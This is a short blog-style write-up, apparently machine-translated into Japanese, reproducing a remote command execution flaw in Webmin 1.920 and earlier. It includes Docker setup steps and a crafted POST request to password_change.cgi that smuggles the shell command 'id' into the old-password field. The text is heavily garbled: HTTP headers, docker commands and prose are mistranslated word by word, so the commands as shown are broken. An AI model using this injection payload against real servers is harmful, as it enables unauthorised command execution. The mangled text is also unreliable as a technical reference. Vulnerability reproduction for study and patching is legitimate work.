Webminの<= 1.920 RCEの脆弱性再現

0x00の序文


もともとはしばらく前で再現したかったのですが、今日は唯一の環境ドッカーに見つけることまで、公式サイトのバージョンは、更新されている、それが再現されています

 

0x01のバージョンに影響します


Webminの<= 1.920

0x02の環境を構築します

ドッキングウィンドウ検索のWebmin 
ドッキングウィンドウpiersonjarvis /のwebmin-サンバプル
10000 -p -dドッカラン:80 piersonjarvis /のwebmin-サンバ

 

 

あなたのIPアドレスにアクセスします。10000のwebminの1.920バージョンにアクセスします

アカウントのパスワードを使用してください:ルートは/ Webminが背景にログインします

パスワードリセット機能を開きます。

Webminの - Webminのconfuration - 認証

 

 

0x03の悪用


ただ、次のようにバッグを手動でデータパッケージを構築つかむように長い検索した後、パスワードを変更するためのインタフェースが、見つかりませんでした。

POST /password_change.cgi HTTP / 1.1 
ホスト:136.244.xx.xx:10000 
のUser-Agent:Mozillaの/ 5.0(Windows NTの10.0; Win64の、x64の、RV:68.0)のGecko / 20100101 Firefoxの/ 68.0Accept:text / htmlの、* / *; Q = 0.01 
のAccept-言語:ZH-CN、ZH; Q = 0.8、ZH-TW; Q = 0.7、ZH-HK; Q = 0.5、EN-US; Q = 0.3、EN; Qが= 0.2 
受け入れ-エンコーディング: gzipで、収縮させる
リファラーをします。http://136.244.xx.xx:?10000 / passwdを/にindex.cgi xnavigation = 1 
X-PJAX:真の
X-PJAX-コンテナ:[データ-dcontainer] 
X-PJAX-URL:passwdの/ ?edit_passwd.cgiユーザー=ルート
Xは、要求された-から:passwdの
X-要求-から-タブ:Webminは
X--で要求:XMLHttpRequestを
コンテンツタイプ:テキスト/平野;のcharset = UTF-8 
のContent-Length:49DNT:1 
接続:近い

ユーザー= laemon &古いです= 123123 | ID &NEW1 = 123456 &NEW2 = 123456

 

 

最終実行コマンドの成功

 

 

参考記事:

https://paper.seebug.org/1019/

より最近の再生の内容は、公共番タイムライン秒に注意してください。

 

国民の関心番タイムライン秒へようこそ

おすすめ

転載: www.cnblogs.com/paperpen/p/11442532.html